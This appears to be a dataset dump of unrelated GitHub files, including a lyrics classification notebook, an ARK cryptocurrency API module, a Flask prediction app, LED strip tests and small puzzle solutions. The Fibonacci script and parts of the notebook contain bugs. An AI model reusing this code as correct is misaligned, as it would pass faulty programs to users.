'lyrics')\ndf_nodupe.dropna(inplace=True)\ndf_nodupe['first_6'] = df_nodupe.titles.str[0:8]\ndf_nodupe.first_6 = df_nodupe.first_6.str.lower()\ndf_nodupe_title = df_nodupe.drop_duplicates(subset = ['first_6', 'main_artist'])\ndf_nodupe_title[df_nodupe_title.first_6.str.contains('how')]\n\nX = df_nodupe_title.lyrics\ny = df_nodupe_title.main_artist\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=42)\n\ncv = CountVectorizer(lowercase=True, stop_words='english', token_pattern='[a-z]+')\ncv.fit(X_train)\nX_cv = cv.transform(X_train)\nX_test_cv = cv.transform(X_test)\n\nX_cv.todense()\n\nnb = MultinomialNB()\n\nnb.fit(X_cv, y_train)\ny_pred = nb.predict(X_test_cv)\n# tf-idf features were referenced before being built; define them here\nvectorizer = TfidfVectorizer(lowercase=True, stop_words='english', token_pattern='[a-z]+')\nX_tf = vectorizer.fit_transform(X_train)\nX_test_tf = vectorizer.transform(X_test)\nnb.fit(X_tf, y_train)\ny_pred_tfid = nb.predict(X_test_tf)\n\npredictions_cv = nb.predict_proba(X_test_cv)\nimport seaborn as sns\nsns.heatmap(predictions_cv)\n\ndef bayes_eval(y_true, y_pred, listofartists):\n    cv_confusionmatrix = confusion_matrix(y_true, y_pred, labels = listofartists ,normalize = 'true' )\n    ax = sns.heatmap(cv_confusionmatrix, annot = True, xticklabels = listofartists, yticklabels = listofartists)\n    ax.set(xlabel='Predicted', ylabel='True')\n    print(classification_report(y_true, y_pred))\n\nimport spacy\nmodel = spacy.load('en_core_web_md')\nX_tokens = [model(song) for song in X]\n\nlemmatized_word = []\nlemmatized_song = ''\nX_lemmatized = []\nfor song in X_tokens:\n    lemmatized_word = []\n    for word in song:\n        lemmatized_word.append(word.lemma_)\n    lemmatized_song = ' '.join(lemmatized_word)\n    X_lemmatized.append(lemmatized_song)\nX_lemmatized[5]\n\nX_train_lem, X_test_lem, y_train, y_test = train_test_split(X_lemmatized, y, test_size=0.33, random_state=42)\ncv_lem = CountVectorizer(stop_words='english', lowercase = False, tokenizer = None, token_pattern='[a-z]+')\ncv_lem.fit(X_train_lem)\nX_train_lemcv = cv_lem.transform(X_train_lem)\nX_test_lemcv = cv_lem.transform(X_test_lem)\ncv_lem.get_feature_names()==cv.get_feature_names()\n\n\n# In[56]:\n\n\nnb.fit(X_train_lemcv, y_train)\ny_pred_lemcv = nb.predict(X_test_lemcv)\nbayes_eval(y_test, y_pred_lemcv, 
list_artists) #slightly different\n\n\n# In[57]:\n\n\ncv_lem = CountVectorizer(stop_words='english', lowercase = False, tokenizer = None, token_pattern='[a-z]+', min_df = 3)\ncv_lem.fit(X_train_lem)\nX_train_lemcv = cv_lem.transform(X_train_lem)\nX_test_lemcv = cv_lem.transform(X_test_lem)\ncv_lem.get_feature_names()==cv.get_feature_names()\n\nnb.fit(X_train_lemcv, y_train)\ny_pred_lemcv = nb.predict(X_test_lemcv)\nbayes_eval(y_test, y_pred_lemcv, list_artists) #changing min_df to 3 really improved things\n\n\n# In[58]:\n\n\nbayes_eval(y_test, y_pred_lemcv, list_artists) #changing min_df to 3\n\n\n# In[59]:\n\n\nvectorizer = TfidfVectorizer(lowercase=True, stop_words='english', token_pattern='[a-z]+', min_df= 5)\nX_train_lemtf =vectorizer.fit_transform(X_train_lem)\nX_test_lemtf = vectorizer.transform(X_test_lem)\n\n\n# In[60]:\n\n\nnb.fit(X_train_lemtf, y_train)\ny_pred_lemtf = nb.predict(X_test_lemtf)\nbayes_eval(y_test, y_pred_lemtf, list_artists) #still really really bad\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# # oversampling and undersampling\n\n# In[61]:\n\n\n#undersample first\nfrom imblearn.under_sampling import RandomUnderSampler, NearMiss\n\n\n# In[62]:\n\n\nlist_artists\n\n\n# In[63]:\n\n\ndf_nodupe_title.groupby('main_artist').count()\n\n\n# In[95]:\n\n\nsamp_dict = {'Queen':50, 'Muse':50, 'Janelle Monáe':30, 'Hot Chip':30,\n 'LCD Soundsystem':30, 'The Postal Service':6, 'Daft Punk':30, 'The Strokes':38 }\nrus = RandomUnderSampler(random_state=10, sampling_strategy=samp_dict)\nnm = NearMiss(sampling_strategy=samp_dict)\n\n\n# In[96]:\n\n\nX_rus, y_rus = rus.fit_resample(X_train_lemcv, y_train)\nX_nm, y_nm = nm.fit_resample(X_train_lemcv, y_train)\n\n\n# In[97]:\n\n\nX_rus.shape, y_rus.shape, np.unique(y_rus, return_counts=True)\n\n\n# In[67]:\n\n\nX_nm.shape, y_nm.shape, np.unique(y_nm, return_counts=True) #decreased overall amount of songs by about half\n\n\n# In[68]:\n\n\nX_train_lemcv.shape\n\n\n# In[ ]:\n\n\nnb.fit(X_rus, y_rus)\ny_pred_rus = nb.predict(X_test_lemcv)\n\n\n# In[69]:\n\n\nbayes_eval(y_test, y_pred_rus, list_artists) #rus destroyed accuracy - and queen can't be guessed as queen\n\n\n# In[ ]:\n\n\nnb.fit(X_nm, y_nm)\ny_pred_nm = nb.predict(X_test_lemcv)\n\n\n# In[70]:\n\n\nbayes_eval(y_test, y_pred_nm, list_artists) # near miss undersample\n\n\n# In[71]:\n\n\n# try oversampling instead\n\n\n# In[72]:\n\n\nfrom imblearn.over_sampling import RandomOverSampler, SMOTE\nupsample_dict = {'Queen':144, 'Muse':75, 'Janelle Monáe':50, 'Hot Chip':64, 'LCD Soundsystem':50,\n 'The Postal Service':20, 'Daft Punk':50, 'The Strokes':50 }\n\nros = RandomOverSampler(random_state=10)\n\n\n# In[73]:\n\n\nX_ros, y_ros = ros.fit_resample(X_train_lemcv, y_train)\n\n\n# In[74]:\n\n\nnp.unique(y_train, return_counts=True)\n\n\n# In[75]:\n\n\nnp.unique(y_ros, return_counts=True)\n\n\n# In[ ]:\n\n\nnb.fit(X_ros, y_ros)\ny_pred_ros = nb.predict(X_test_lemcv)\n\n\n# In[76]:\n\n\nbayes_eval(y_test, y_pred_ros, list_artists) #ros upsample to 144 for each\n\n\n# In[77]:\n\n\nfrom imblearn.over_sampling import SMOTE\n\n\n# In[78]:\n\n\nsm = SMOTE(random_state=42)\n\n\n# In[79]:\n\n\nX_sm, y_sm = sm.fit_resample(X_train_lemcv, y_train)\n\n\n# In[80]:\n\n\nnp.unique(y_sm, return_counts=True)\n\n\n# In[ ]:\n\n\nnb.fit(X_sm, y_sm)\ny_pred_sm = nb.predict(X_test_lemcv)\n\n\n# In[81]:\n\n\n#SMOTE upsample to 144 for each\nbayes_eval(y_test, y_pred_sm, list_artists) #works better for me than random\n\n\n# In[82]:\n\n\n#combine upsample and down sample\n\n\n# In[83]:\n\n\nfrom imblearn.combine 
import SMOTEENN\n\n\n# In[84]:\n\n\nsamp_dict\n\n\n# In[85]:\n\n\nsme = SMOTEENN(random_state=42)\n\n\n# In[86]:\n\n\nX_sme, y_sme = sme.fit_resample(X_train_lemcv, y_train)\n\n\n# In[87]:\n\n\nnp.unique(y_sme, return_counts=True)\n\n\n# In[ ]:\n\n\nnb.fit(X_sme, y_sme)\ny_pred_sme = nb.predict(X_test_lemcv)\n\n\n# In[88]:\n\n\nbayes_eval(y_test, y_pred_sme, list_artists) #that really killed accuracy, why did it bring the queen songs down to 2?\n\n\n# In[89]:\n\n\nfrom imblearn.combine import SMOTETomek\nupsample_dict\n\n\n# In[126]:\n\n\nsmt_dict = {'Queen': 144,'Muse': 100,'Janelle Monáe': 60, 'Hot Chip': 64, 'LCD Soundsystem': 60,'The Postal Service': 30,'Daft Punk': 60,'The Strokes': 60}\nsmt = SMOTETomek(random_state=42 )\nsampling_strategy=smt_dict\nX_smt, y_smt = smt.fit_resample(X_train_lemcv, y_train)\nnb.fit(X_smt, y_smt)\ny_pred_smt = nb.predict(X_test_lemcv)\n\n\n# In[128]:\n\n\nbayes_eval(y_test, y_pred_smt, list_artists) #SMOTETomek looks the same as SMOTE - 144 songs for each\n\n\n# In[ ]:\n\n\n\n\n\n# In[91]:\n\n\n# if time, write function to optimize the upsampling\n\n\n# In[92]:\n\n\n# make word clouds for fun\n\n\n# In[93]:\n\n\nfrom matplotlib import pyplot as plt\nimport wordcloud\n\n#mask = np.____((500, ____, 3), _____)\n#mask[150:350,____:350,:] = 255 # masked out area\ndef make_wordclouds(all_songs_list):\n fig, axs = plt.subplots(nrows=4, ncols=2,figsize=(10, 10))\n axs = axs.flatten()\n list_artists = ['Queen', 'Muse', 'Janelle Monáe', 'Hot Chip', 'LCD Soundsystem','The Postal Service', 'Daft Punk', 'The Strokes']\n# axes_list =[ ax1, ax2, ax3, ax4, ax5, ax6, ax7, ax8]\n for i, artist_list in enumerate(allsongs_list):\n cloud = wordcloud.WordCloud(background_color=\"white\",\n max_words=50,\n collocations=True, # calculates frequencies\n contour_color='steelblue').generate(''.join(artist_list))\n # stop words are removed!\n axs[i].imshow(cloud, interpolation='bilinear')\n axs[i].axis('off')\n name = str(artist_list)\n axs[i].set_title(str(list_artists[i]))\n\nplt.show()\n\n\n# In[122]:\n\n\nmake_wordclouds(allsongs_list)\n\n\n# In[ ]:\n\n\n\n\n\n# In[99]:\n\n\n#trying a random forest classifier for fun\nfrom sklearn.ensemble import RandomForestClassifier\nrfc = RandomForestClassifier()\n\n\n# In[100]:\n\n\nrfc.fit(X_train_lemcv, y_train)\ny_pred_rfc = rfc.predict(X_test_lemcv)\n\n\n# In[101]:\n\n\nbayes_eval(y_test, y_pred_rfc, list_artists) #randomforest did a little worse than the bayes\n\n\n# In[102]:\n\n\nsamp_dict\n\n\n# In[103]:\n\n\nupsample_dict\n\n\n# In[104]:\n\n\ndownsam_dict = {'Queen': 100,\n 'Muse': 75,\n 'Janelle Monáe': 50,\n 'Hot Chip': 64,\n 'LCD Soundsystem': 50,\n 'The Postal Service': 20,\n 'Daft Punk': 40,\n 'The Strokes': 50}\n\n\n# In[105]:\n\n\nnp.unique(y_train, return_counts=True)\n\n\n# In[106]:\n\n\nfrom imblearn.under_sampling import EditedNearestNeighbours\nfrom imblearn.pipeline import make_pipeline\nupsmote= SMOTE(random_state=42, sampling_strategy= upsample_dict)\nenn = EditedNearestNeighbours() # this works poorly in the pipeline\nrus = RandomUnderSampler(random_state=42, sampling_strategy=downsam_dict)\n\n\n# In[107]:\n\n\nup_down_pipeline = make_pipeline(upsmote, rus, nb)\n\n\n# In[108]:\n\n\nup_down_pipeline.fit(X_train_lemcv, y_train)\n\n\n# In[109]:\n\n\ny_pred_pipeline = up_down_pipeline.predict(X_test_lemcv)\n\n\n# In[110]:\n\n\nbayes_eval(y_test, y_pred_pipeline, list_artists) # Is this better? 
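# Why the samplers below get combined with imblearn's make_pipeline rather
# than sklearn's: imblearn pipelines apply resampling steps during fit()
# only, so the held-out test matrix is never resampled at predict time.
# Minimal sketch with the same estimators used elsewhere in this file:
from imblearn.over_sampling import SMOTE
from imblearn.pipeline import make_pipeline as make_imb_pipeline
from sklearn.naive_bayes import MultinomialNB

demo_pipeline = make_imb_pipeline(SMOTE(random_state=42), MultinomialNB())
# demo_pipeline.fit(X_train_lemcv, y_train)    # SMOTE resamples here...
# demo_pipeline.predict(X_test_lemcv)          # ...but not here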
Unclear\n\n\n# In[111]:\n\n\n#try pipeline with tfidf vectorized data\nup_down_pipeline.fit(X_train_lemtf, y_train)\n\n\n# In[112]:\n\n\ny_pred_pipeline_tf = up_down_pipeline.predict(X_test_lemtf)\n\n\n# In[113]:\n\n\nbayes_eval(y_test, y_pred_pipeline, list_artists) #with resampling, looks essentially the same was with cv\n\n\n# In[124]:\n\n\naccuracy_summary = {'Strategy':['CV', 'Tfidf', 'CV+lemma', 'CV+lemma+min_df','Tfidf+lemma', 'Tfidf+lemma+min_df',\n 'CV+lemma+Rus',\n 'CV+lemma+NearMiss', 'CV+lemma+Ros', 'CV+lemma+SMOTE', 'CV+lemma+smoteteen',\n 'CV+lemma+Smotetomek','Random Forest - CV+lemma', 'CV+lemma+pipeline',\n 'Tfidf+lemma+pipeline'], 'Accuracy':[0.47, 0.28, 0.55, 0.55, 0.28,\n 0.29, 0.44, 0.42, 0.49,0.56,\n 0.35, 0.53, 0.45, 0.51, 0.51]}\ndf_summary = pd.DataFrame(accuracy_summary, columns = ['Strategy', 'Accuracy'])\n\n\n# In[125]:\n\n\ndf_summary.sort_values('Accuracy', ascending = False)\n\n\n# In[123]:\n\n\nmake_wordclouds(allsongs_list)\n\n\n# ### What I've learned from doing this:\n# - Lemmatization makes a big difference\n# - Several issues with really small sample sizes\n# - in training\n# - in calculating accuracy\n# - Pipelines/resampling/etc.\n# ### Further questions:\n# - How to more effectively use Spacy\n# - How can we use Spacy to effectively look at document similarity\n# - Upsampling before tfidf?\n# ### Things to add to this project:\n# - Combine into single py file with the best looking model, allow user input of new song for test (in progress)\n# - Iteratively remove artists to see what the best combination is\n# - Iterirate through different values for the sampling strategies to optimize pipeline\n# - Add features - usage of parts of speech, sentiment analysis\n# - Mask word clouds onto some kind of symbol/art for the artist\n# - Add Spotify playlist\n\n# In[116]:\n\n\nget_ipython().system('dbus-send --print-reply --dest=org.mpris.MediaPlayer2.spotify /org/mpris/MediaPlayer2 org.mpris.MediaPlayer2.Player.Play')\n\n\n\n# In[117]:\n\n\n#try the spacy with spacys own vectorization\ntype(X_tokens[1])\n\n\n# In[118]:\n\n\n#turn each word into a vector\ndef vector(tokens):\n\n song_vectors = []\n for item in tokens:\n word_vectors=[]\n for word in item:\n word_vectors.append(model.vocab[word].vector)\n song_vectors.append(word_vectors)\n return song_vectors\n\n\n# In[119]:\n\n\n#totally confused\nspacy_vectors = vector(X_tokens)\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[120]:\n\n\nfrom spacy.lemmatizer import Lemmatizer\nfrom spacy.lookups import Lookups\n\nlookups = Lookups()\nlemmatizer = Lemmatizer(lookups)\nX_lemmas = lemmatizer(X)\nprint(X_lemmas)\n\n#this is a dead end - lemmatizer is only for single words maybe?\n\n\n# In[121]:\n\n\n# make lists for each artist\n# maybe this was unecessary\n\nqueen_list = df_nodupe_title[df_nodupe_title['main_artist']=='Queen'].lyrics.to_list()\nmuse_list = df_nodupe_title[df_nodupe_title['main_artist']=='Muse'].lyrics.to_list()\njanelle_list = df_nodupe_title[df_nodupe_title['main_artist']=='Janelle Monáe'].lyrics.to_list()\nhotchip_list = df_nodupe_title[df_nodupe_title['main_artist']=='Hot Chip'].lyrics.to_list()\nlcd_list = df_nodupe_title[df_nodupe_title['main_artist']=='LCD Soundsystem'].lyrics.to_list()\npostalservice_list = df_nodupe_title[df_nodupe_title['main_artist']=='The Postal Service'].lyrics.to_list()\ndaftpunk_list = df_nodupe_title[df_nodupe_title['main_artist']=='Daft Punk'].lyrics.to_list()\nstrokes_list = 
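# The per-artist list-building just below is the repetitive pattern the
# author flags ("there has got to be a better way"); a pandas groupby
# sketch that produces the same lists in one pass:
lyrics_by_artist = df_nodupe_title.groupby('main_artist')['lyrics'].apply(list)
allsongs_list_alt = [lyrics_by_artist[artist] for artist in list_artists]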
df_nodupe_title[df_nodupe_title['main_artist']=='The Strokes'].lyrics.to_list()\n\nallsongs_list = [queen_list, muse_list, janelle_list, hotchip_list, lcd_list, postalservice_list, daftpunk_list,strokes_list]\n\n#there has got to be a better way to do this, but can't change the list name in a for loop\n\n#for artist in list_artists:\n #lyrics_dict = df_nodupe_title[df_nodupe_title['main_artist']==str(artist)].lyrics.to_dict()\n\n#df_nodupe_title.index = df_nodupe_title.main_artist\n#lyrics_dict = df_nodupe_title.to_dict('index')# dictionary is overwriting\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n","repo_name":"thedinak/lyrics_analysis","sub_path":"lyrics_classifier.py","file_name":"lyrics_classifier.py","file_ext":"py","file_size_in_byte":14199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9702366538","text":"# -*- encoding: utf8 -*-\n# created by Toons on 01/05/2017\nimport sys, binascii\nimport json, requests\n\n__PY3__ = True if sys.version_info[0] >= 3 else False\nif __PY3__:\n\tfrom io import BytesIO as StringIO\n\tlong = int\nelse:\n\tfrom StringIO import StringIO\n\n\n# GET generic method for ARK API\ndef get(api, dic={}, **kw):\n\treturnkey = kw.pop(\"returnKey\", False)\n\tdata = json.loads(requests.get(__URL_BASE__+api, params=dict(dic, **kw)).text)\n\tif data[\"success\"] and returnkey: return ArkyDict(data[returnkey])\n\telse: return ArkyDict(data)\n\n\nclass ArkyDict(dict):\n\t\"\"\"\nPython dict with javascript behaviour.\n>>> ad = ArkyDict()\n>>> ad[\"key1\"] = \"value1\"\n>>> ad.key2 = \"value2\"\n>>> ad\n{'key2': 'value2', 'key1': 'value1'}\n\"\"\"\n\t__setattr__ = lambda obj,*a,**k: dict.__setitem__(obj, *a, **k)\n\t__getattr__ = lambda obj,*a,**k: dict.__getitem__(obj, *a, **k)\n\t__delattr__ = lambda obj,*a,**k: dict.__delitem__(obj, *a, **k)\n\n\ndef swich(net=False):\n\t\"\"\"\nSwich between mainnet and testnet\n>>> swich(True) # use mainnet\n>>> swich(False) # use testnet\n\"\"\"\n\tglobal __NETWORK__, __URL_BASE__, __HEADERS__\n\n\t__NETWORK__ = ArkyDict()\n\t__HEADERS__ = ArkyDict()\n\n\tif net:\n\t\t# values are not all correct\n\t\t__URL_BASE__ = \"http://node1.arknet.cloud:4000\"\n\t\t__NETWORK__.update(\n\t\t\tmessagePrefix = b\"\\x18Ark Signed Message:\\n\",\n\t\t\tbip32 = ArkyDict(public=0x043587cf, private=0x04358394),\n\t\t\tpubKeyHash = b\"\\x6f\",\n\t\t\twif = b\"\\xef\",\n\t\t)\n\t\t__HEADERS__.update({\n\t\t\t'Content-Type': 'application/json; charset=utf-8',\n\t\t\t'os': 'arkwalletapp',\n\t\t\t'version': '0.5.0',\n\t\t\t'port': '1',\n\t\t\t'nethash': \"ed14889723f24ecc54871d058d98ce91ff2f973192075c0155ba2b7b70ad2511\"\n\t\t})\n\n\telse:\n\t\t__URL_BASE__ = \"http://node1.arknet.cloud:4000\"\n\t\t__NETWORK__.update(\n\t\t\tmessagePrefix = b\"\\x18Testnet Ark Signed Message:\\n\",\n\t\t\tbip32 = ArkyDict(public=0x0488b21e, private=0x0488ade4),\n\t\t\tpubKeyHash = b\"\\x17\",\n\t\t\twif = b\"\\xaa\",\n\t\t)\n\t\t__HEADERS__.update({\n\t\t\t'Content-Type': 'application/json; charset=utf-8',\n\t\t\t'os': 'arkwalletapp',\n\t\t\t'version': '0.5.0',\n\t\t\t'port': '1',\n\t\t\t'nethash': \"8b2e548078a2b0d6a382e4d75ea9205e7afc1857d31bf15cc035e8664c5dd038\"\n\t\t})\n\nswich(False)\n\n\n# ARK fees according to transactions in SATOSHI\n__FEES__ = ArkyDict({\n\t\"send\": 10000000,\n\t\"vote\": 100000000,\n\t\"delegate\": 2500000000,\n\t\"secondsignature\": 500000000,\n\t\"multisignature\": 500000000,\n\t\"dapp\": 
2500000000\n})\n","repo_name":"ravelou/arky","sub_path":"arky/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"45072385586","text":"from flask import Flask, render_template, request\nimport pickle\nfrom sklearn.preprocessing import MinMaxScaler\n\napp = Flask(__name__)\n\nwith open('gb_model.pkl', 'rb') as model_file:\n loaded_gb_model = pickle.load(model_file)\n\n# Routes\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/predict', methods=['POST'])\ndef predict():\n if request.method == 'POST':\n\n user_id = request.form['user_id']\n age = float(request.form['age'])\n gender = 1 if request.form['gender'] == 'Male' else 0\n salary = float(request.form['salary'])\n \n prediction = loaded_gb_model.predict([[age, gender, salary]])\n\n if prediction[0] == 1:\n result_message = f\"Customer with ID {user_id} is likely to purchase a car.\"\n else:\n result_message = f\"Customer with ID {user_id} is unlikely to purchase a car.\"\n \n return render_template('result.html', prediction=prediction[0], message=result_message)\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"smartinternz02/SI-GuidedProject-611318-1698393972","sub_path":"Project Development Phase/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24913463773","text":"from custom_types import PixelToLight\nfrom utils import get_strip_and_index, group_pixels_to_light_by_pin, assemble_strip_config\n\n\ndef test_get_strip_and_index_none():\n \"\"\"\n too far away to light anything\n \"\"\"\n strip_1 = {\n \"offset\": 2.2,\n \"length\": 1,\n \"leds_per_m\": 30,\n \"gpio_pin\": 18,\n \"reverse\": False,\n }\n strip_2 = {\n \"offset\": 1,\n \"length\": 1,\n \"leds_per_m\": 30,\n \"gpio_pin\": 13,\n \"reverse\": False,\n }\n strips = [strip_1, strip_2]\n\n dist = 3\n\n strip, index = get_strip_and_index(strips, dist)\n assert strip is None\n assert index is None\n\n\ndef test_get_strip_and_index_strip_1():\n \"\"\"\n light strip further away\n \"\"\"\n strip_1 = {\n \"offset\": 2.2,\n \"length\": 1,\n \"leds_per_m\": 30,\n \"gpio_pin\": 18,\n \"reverse\": False,\n }\n strip_2 = {\n \"offset\": 1,\n \"length\": 1,\n \"leds_per_m\": 30,\n \"gpio_pin\": 13,\n \"reverse\": False,\n }\n strips = [strip_1, strip_2]\n\n dist = 2\n\n strip, index = get_strip_and_index(strips, dist)\n assert strip[\"offset\"] == strip_1[\"offset\"]\n assert index is not None\n\n\ndef test_get_strip_and_index_strip_1_reverse():\n \"\"\"\n light strip further away\n \"\"\"\n strip_1 = {\n \"offset\": 2.2,\n \"length\": 1,\n \"leds_per_m\": 30,\n \"gpio_pin\": 18,\n \"reverse\": True,\n }\n strip_2 = {\n \"offset\": 1,\n \"length\": 1,\n \"leds_per_m\": 30,\n \"gpio_pin\": 13,\n \"reverse\": False,\n }\n strips = [strip_1, strip_2]\n\n dist = 2\n\n strip, index = get_strip_and_index(strips, dist)\n assert strip[\"offset\"] == strip_1[\"offset\"]\n expected_index = (\n strip_1[\"length\"] * strip_1[\"leds_per_m\"]\n - (strip_1[\"offset\"] - dist) * strip_1[\"leds_per_m\"]\n )\n assert index == round(expected_index)\n\n\ndef test_get_strip_and_index_strip_2():\n \"\"\"\n light strip closer by\n \"\"\"\n strip_1 = {\n \"offset\": 2.2,\n \"length\": 1,\n \"leds_per_m\": 30,\n \"gpio_pin\": 18,\n \"reverse\": False,\n }\n strip_2 = {\n \"offset\": 1,\n 
\"length\": 1,\n \"leds_per_m\": 30,\n \"gpio_pin\": 13,\n \"reverse\": False,\n }\n strips = [strip_1, strip_2]\n\n dist = 0.1\n\n strip, index = get_strip_and_index(strips, dist)\n assert strip[\"offset\"] == strip_2[\"offset\"]\n assert index is not None\n\n\ndef test_get_strip_and_index_gap():\n \"\"\"\n don't light anything in strip gap\n \"\"\"\n strip_1 = {\n \"offset\": 2.2,\n \"length\": 1,\n \"leds_per_m\": 30,\n \"gpio_pin\": 18,\n \"reverse\": False,\n }\n strip_2 = {\n \"offset\": 1,\n \"length\": 1,\n \"leds_per_m\": 30,\n \"gpio_pin\": 13,\n \"reverse\": False,\n }\n strips = [strip_1, strip_2]\n\n dist = 1.1\n\n strip, index = get_strip_and_index(strips, dist)\n assert strip is None\n assert index is None\n\n\ndef test_group_pixels_by_pin():\n \"\"\"\n group pixels to be lit correctly by pin number\n \"\"\"\n pixel_1: PixelToLight = {\"pin\": 1, \"pixel_index\": 3, \"color\": \"#f00000\"}\n pixel_2: PixelToLight = {\"pin\": 2, \"pixel_index\": 3, \"color\": \"#ffffff\"}\n pixel_3: PixelToLight = {\"pin\": 2, \"pixel_index\": 4, \"color\": \"#000000\"}\n\n grouped = group_pixels_to_light_by_pin([pixel_1, pixel_2, pixel_3])\n\n assert 1 in grouped.keys()\n assert 2 in grouped.keys()\n assert len(grouped[2]) == 2\n\n\ndef test_assemble_strip_config():\n \"\"\"\n assemble strip config correctly\n \"\"\"\n strip_1 = {\n \"offset\": 2.2,\n \"length\": 1,\n \"leds_per_m\": 30,\n \"gpio_pin\": 18,\n \"reverse\": False,\n }\n strip_2 = {\n \"offset\": 1,\n \"length\": 1,\n \"ledsPerM\": 60,\n \"gpioPin\": 13,\n \"reverse\": False,\n }\n strips = [strip_1, strip_2]\n\n strip_config = assemble_strip_config(strips)\n\n assert len(strip_config) == 2\n assert strip_config[0][\"gpio_pin\"] == strip_1[\"gpio_pin\"]\n assert strip_config[0][\"leds_per_m\"] == strip_1[\"leds_per_m\"]\n assert strip_config[1][\"gpio_pin\"] == strip_2[\"gpioPin\"]\n assert strip_config[1][\"leds_per_m\"] == strip_2[\"ledsPerM\"]","repo_name":"creimers/dont-led-me-down","sub_path":"test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":4210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"8244555974","text":"\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, val, children):\n self.val = val\n self.children = children\n\"\"\"\nclass Solution:\n def postorder(self, root: 'Node') -> List[int]:\n # first a recursive solution\n if not root: return []\n if not root.children: return [root.val]\n \n ls = []\n for i in root.children:\n ls = ls + self.postorder(i)\n ls = ls + [root.val]\n return ls\n \n # and now an iterative solution\n # although for the record iteration and trees go together... poorly.\n \n # tbh right now i'm too tired to finish this but there's a decent chance i'll finish it tomorrow\n # honestly i'm exhausted, i already solved the problem the intuitive way,\n # and i'm gonna store it on github before i go to bed so i don't lose it\n # but for the record it's just an iterative dfs (which is a shitty way to code a dfs)\n # and we just shove stuff in a stack. 
idk i'm so tired you guys.\n \n '''if not root: return []\n if not root.children: return [root.val]\n \n ls = [] # an actual list of the elts\n stack = [] # the stack we're drawing from'''\n","repo_name":"annasw/LeetCode","sub_path":"586-N-ary-Tree-Postorder-Traversal.py","file_name":"586-N-ary-Tree-Postorder-Traversal.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"11169635225","text":"import InputReader\n\n\ndef main():\n keys = InputReader.readInputFileNumbers(25)\n subjectNumber = 7\n\n encryptionKey = getKey(keys[1], getLoopSize(keys[0], subjectNumber))\n print(f\"The encryption key is {encryptionKey}.\")\n\n\ndef getKey(subjectNumber, loopSize):\n \"\"\"Generates the encryption key from the subject number and the loop size.\n \n The encryption key starts as 1.\n Then the following actions get executed loop size times:\n \n * multiply the previous value by the subject number\n * set the encryption key to the remainder from dividing the previous\n result by 20201227\n \n Parameters\n ----------\n subjectNumber: int\n The subject number to use in the calculation.\n loopSize: int\n How many times to execute the calculation.\n \n Returns\n -------\n int\n The resulting encryption key.\n \"\"\"\n value = 1\n for _ in range(loopSize):\n value = value * subjectNumber % 20201227\n return value\n\n\ndef getLoopSize(key, subjectNumber):\n \"\"\"Reverse engineers the loop size from the given key and subject number.\n \n This is done by continually dividing the key by the subject number\n until the result matches 1.\n If the result has decimal digits 20201227 gets added to the previous\n key, before it is divided again.\n By counting the divisions the loop size can be determined.\n \n Parameters\n ----------\n key: int\n The key to get the loop size for.\n subjectNumber: int\n The subject number used to generate the key.\n \n Returns\n -------\n int\n The loop size used to generate the given key.\n \"\"\"\n loopSize = 0\n while key != 1:\n newKey = key / subjectNumber\n while newKey % 1 != 0:\n key += 20201227\n newKey = key / subjectNumber\n\n key = newKey\n loopSize += 1\n\n return loopSize\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ToMe25/AdventOfCode","sub_path":"2020/Python/src/Day25.py","file_name":"Day25.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"4786913438","text":"\"\"\"\nFibonacci\n\nCreated on Mon Feb 28, 2022\n\n@author: Th3-Al7ha10\n\n\n\"\"\"\npos = input('Please enter the position of the number in Fibonacci sequence \\n')\n\ndef fibonacci (k):\n\n if k==1:\n return 0\n else:\n return fibonacci(k-1) + k-1\n \nfor i in range (1,pos+1):\n print('{}e position: {}'.format(i,fibonacci(i)))\n","repo_name":"Th3-Al7ha10/Python-Projects-Level-1","sub_path":"fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"28343708803","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 9 09:38:22 2017\n\n@author: neal\n\"\"\"\nimport csv\n\nclass LoadSensorTsvFile:\n \"\"\"\n \"\"\"\n def __init__(self):\n self.files_data = []\n self.feature = []\n \n pass\n \n def read_in_file(self, file): \n csv_reader = csv.reader(open(file))\n file_data = [[0]*51]*7\n row_num = 0\n for row in csv_reader:\n 
